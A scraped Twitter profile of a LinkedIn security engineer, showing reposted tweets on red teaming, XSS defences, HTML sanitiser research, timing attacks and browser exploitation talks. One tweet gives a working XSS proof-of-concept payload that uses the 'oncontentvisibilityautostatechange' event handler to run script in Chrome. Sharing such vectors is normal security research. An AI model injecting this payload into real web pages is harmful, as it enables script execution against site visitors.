Roman Shafigullin (@shafigullin)'s Twitter Profile

Security at LinkedIn

ID: 35439611

Link: https://lnkd.in/xss
Joined: 26-04-2009 09:59:30

2,2K Tweet

5,5K Followers

912 Following

Хабр (@habr_com)

Red team, black day: why seasoned pentesters screw up in Red Team. Even experienced specialists don't always see the subtle differences between pentests and Red Team. The difference lies in the approach to identifying vulnerabilities and assessing an organization's security: u.habr.com/MGSnU
Masato Kinugawa (@kinugawamasato)

ooh, this works on Chrome Canary :D <input type="hidden" oncontentvisibilityautostatechange="alert(/ChromeCanary/)" style="content-visibility:auto">

Lukas Weichselbaum (@we1x)

The dedication and hard work has paid off: "for hundreds of complex web applications that are built on Google’s hardened and safe-by-design frameworks, we've averaged less than one XSS report per year in total" (see page 9 of the whitepaper).

MDN Web Docs (@mozdevnet)

Did you know about Strict Mode? 🤔 ✨ "use strict"; ✨ Strict Mode catches silent errors, making your code more predictable and easier to debug. It also improves performance and helps you write more secure JavaScript code. See how 👇 developer.mozilla.org/en-US/docs/Web…

Kévin GERVOT (Mizu) (@kevin_mizu)

I'm thrilled to finally share my research on HTML parsing and DOMPurify at @GreHack 2024 📜 The research article is available here: mizu.re/post/exploring… The slides are available here: slides.com/kevin-mizu/gre… 1/3

James Kettle (@albinowax)

We’re finally live! You can now watch “Listen to the whispers: web timing attacks that actually work” on YouTube: youtube.com/watch?v=zOPjz-…

Alisa Esage Шевченко (@alisaesage)

Releasing full 2+hr video of my browser exploitation workshop from VXCON 2024: youtube.com/live/b9OhamkAY… In which I show what goes inside the mind of a skilled hacker while exploiting a highly non-trivial vulnerability in v8, from zero to exploit concept. Especially this workflow

Google VRP (Google Bug Hunters) (@googlevrp)

Developers, tired of DOM XSS in your web applications? 😩 We were too. See how we refactored our code to solve Trusted Types violations in Gmail & AppSheet. Your guide to a safer web is here! bughunters.google.com/blog/585078655…